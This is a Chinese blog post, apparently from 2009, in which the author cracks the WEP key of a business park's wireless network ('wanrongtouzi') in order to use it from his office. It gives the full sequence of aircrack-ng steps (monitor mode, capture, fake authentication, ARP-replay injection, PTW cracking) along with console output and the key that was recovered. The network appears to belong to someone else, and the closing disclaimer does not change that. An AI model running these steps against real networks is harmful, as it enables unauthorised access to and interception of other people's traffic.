公司木有無線網絡, 所以自從入手E63開始就覬覦園區的無線了. 網上找了找linux下比較流行的工具是aircrack-ng ,很好很強大.
看了扶凱桑給的一個實例, 不過和俺用的攻擊方式不一. 官網上資料充足, 下面memo一下過程,僅供參考, 不推薦惡意實踐.
使用的機器是改裝EEEPC, UBUNTU8.10, 前提是安裝aircrack-ng(apt-get簡單入手).
1 設置網卡爲監聽模式
gladstone@gladstone-eeepc:~$ sudo airmon-ng start wlan0
2 尋找目標AP(Access Point)
gladstone@gladstone-eeepc:~$ sudo airodump-ng mon0
會出現一個列表,列出可用的無線網絡, 這裏找到目標路由器的bssid爲00:B0:0C:02:A7:DE, 而ifconfig得到本機的mac地址是00:15:af:a6:c8:d7
3 開始收集信息
gladstone@gladstone-eeepc:~$ sudo airodump-ng -c 1 --bssid 00:B0:0C:02:A7:DE -w out-ag mon0
需要注意的是參數
–c 是目標AP所在的頻道, 這裏是1
--bssid 輸入目標AP的mac地址
-w 是寫入到文件的前綴定義,這裏設定爲out-ag 的話,真正的輸出文件會是out-ag-01.cap
控制檯輸出:
CH 1 ][ Elapsed: 4 mins ][ 2009-06-03 09:55 ][ fixed channel mon0: 7
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:B0:0C:02:A7:DE 155 12 1033 19059 19 1 54 WEP WEP OPN wanrongtouzi
BSSID STATION PWR Rate Lost Packets Probes
00:B0:0C:02:A7:DE 00:B0:C6:00:46:1F 163 18- 2 0 24 wanrongtouzi 00:B0:0C:02:A7:DE 00:15:AF:A6:C8:D7 0 0- 0 157795 88998
注意這個終端不要關掉,在整個破解過程中都要開着以收集信息.
4 開始進行攻擊
攻擊使用的是aireplay-ng 工具,這個工具通過參數可以設定攻擊方法(具體見aireplay-ng --help), 扶凱桑用的是chopchop, 這裏用arp
gladstone@gladstone-eeepc:~$ sudo aireplay-ng -3 -a 00:B0:0C:02:A7:DE -b 00:B0:0C:02:A7:DE -h 00:15:af:a6:c8:d7 mon0
這裏一開始遇到問題, 控制檯收到如下信息
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
這個問題在官網wiki上有詳細描述: http://www.aircrack-ng.org/doku.php?id=i_am_injecting_but_the_ivs_don_t_increase
解決辦法就是在執行上述命令之前先進行認證:
gladstone@gladstone-eeepc:~$ sudo aireplay-ng -1 0 -a 00:B0:0C:02:A7:DE -e wanrongtouzi -h 00:15:af:a6:c8:d7 mon0
09:51:26 Waiting for beacon frame (BSSID: 00:B0:0C:02:A7:DE) on channel 1
09:51:28 Sending Authentication Request (Open System)
09:51:28 Authentication successful
09:51:28 Sending Association Request
09:51:33 Sending Authentication Request (Open System)
09:51:33 Authentication successful
09:51:33 Sending Association Request
09:51:33 Association successful :-) (AID: 1)
然後再重新開始攻擊:
gladstone@gladstone-eeepc:~$ sudo aireplay-ng -3 -a 00:B0:0C:02:A7:DE -b 00:B0:0C:02:A7:DE -h 00:15:af:a6:c8:d7 mon0
09:52:00 Waiting for beacon frame (BSSID: 00:B0:0C:02:A7:DE) on channel 1
Saving ARP requests in replay_arp-0603-095200.cap
You should also start airodump-ng to capture replies.
^Cad 108414 packets (got 56293 ARP requests and 44578 ACKs), sent 50832 packets...(499 pps)
執行完這步就開始靜候,發現包的數量快速上升, 在另外一個控制檯(airodump-ng)裏可以觀測到注入的跑的數量上升, #/s指標達到30左右(這個沒有定量,官方的說法是可以達到幾百, 在家裏試的時候最高到了80, 可能和機器速度有關)
5 根據收集的信息破解密碼
大約過2分鐘就可以試着使用aircrack-ng 進行破解了,上面說到收集到的包都存在out-ag-01.cap 文件裏面
gladstone@gladstone-eeepc:~$ sudo aircrack-ng out-ag-01.cap
Opening out-ag-01.cap
Read 94019 packets.
# BSSID ESSID Encryption
1 00:B0:0C:02:A7:DE wanrongtouzi WEP (17803 IVs)
Choosing first network as target.
Opening out-ag-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 17887 ivs.
Aircrack-ng 1.0 rc1
Aircrack-ng 1.0 rc1
Aircrack-ng 1.0 rc1
[00:00:01] TesteAircrack-ng 1.0 rc117823 IVs)
[00:00:03] TesteAircrack-ng 1.0 rc117823 IVs)
KB depth byte(vote) [00:00:04] TesteAircrack-ng 1.0 rc117823 IVs)
KB depth byte(vote)D7(23040) 24(22784)[00:00:06] TesteAircrack-ng 1.0 rc117823 IVs)
KB depth byte(vote)D7(23040) 24(22784)[00:00:07] TesteAircrack-ng 1.0 rc117823 IVs)
KB depth byte(vote)D7(23040) 24(22784)[00:00:09] TesteAircrack-ng 1.0 rc117823 IVs)
KB depth byte(vote)D7(23040) 24(22784)[00:00:11] TesteAircrack-ng 1.0 rc117823 IVs)
KB depth byte(vote)D7(23040) 24(22784)[00:00:12] TesteAircrack-ng 1.0 rc1 17823 IVs)
KB depth byte(vote)D7(23040) 24(22784)[00:00:14] TesteAircrack-ng 1.0 rc1 17823 IVs)
KB depth byte(vote)D7(23040) 24(22784)[00:00:14] TesteAircrack-ng 1.0 rc1 17823 IVs)
KB depth byte(vote)D7(23040) 24(22784)[00:00:15] TesteAircrack-ng 1.0 rc1 17823 IVs)
KB depth byte(vote)D7(23040) 24(22784)[00:00:16] Tested 1347841 keys (got 17823 IVs)
KB depth byte(vote)D7(23040) 24(22784)[00:00:17] Tested 1425601 keys (got 17823 IVs)
KB depth byte(vote)D7(23040) 24(22784)[00:00:17] Tested 3002 keys (got 17823 IVs)
KB depth byte(vote)D7(23040) 24(22784) AA(22784) CB(22784) 4E(22528) 39(22272) 50(22272) 75(21504) 81(21504)
KB depth byte(vote)D7(23040) 24(22784) AA(22784) CB(22784) 4E(22528) 39(22272) 50(22272) 75(21504) 81(21504)
0 4/ 8 AA(23296) 39(23040) 4E(23040) CE(22784) 0F(22272) 50(22272) 25(22016) 75(22016) 81(22016) E4(22016)
1 0/ 5 BB(25088) 78(24064) 5D(23808) 8D(23808) 3A(23296) BD(23040) 68(22784) 8C(22784) 3F(22528) A5(22528)
2 6/ 8 A1(23296) 31(23040) 4F(23040) C8(23040) D5(23040) DC(22784) 2D(22528) 78(22528) 3D(22272) 5B(22272)
3 0/ 10 DD(23808) 12(23296) A8(23040) C0(23040) 1F(22528) 25(22528) DB(22272) F3(22272) 00(22272) 56(22272)
4 0/ 1 FF(31488) E5(24320) 29(23552) 3C(23552) 40(23552) 49(23296) F8(23296) 47(23040) 60(23040) C1(23040)
KEY FOUND! [ AA:BB:CC:DD:FF ]
Decrypted correctly: 100%
順利得到密碼, 還真是設置的夠簡單= _ =.
上面提到的只是簡單的WEP的破解, 根據密碼設置的複雜程度所用時間不一, WPA貌似很難破解, 下次再試試